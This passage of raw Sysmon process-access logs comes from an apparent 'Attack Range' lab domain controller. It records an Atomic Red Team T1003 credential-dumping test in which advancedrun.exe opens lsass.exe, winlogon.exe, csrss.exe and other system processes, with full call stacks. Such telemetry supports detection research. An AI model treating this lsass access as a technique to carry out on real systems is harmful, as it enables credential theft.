cs\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952075Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952074Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952073Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952072Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952071Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952070Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952069Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952067Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952066Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952065Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952064Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952063Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952062Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952061Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952060Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952059Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952058Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\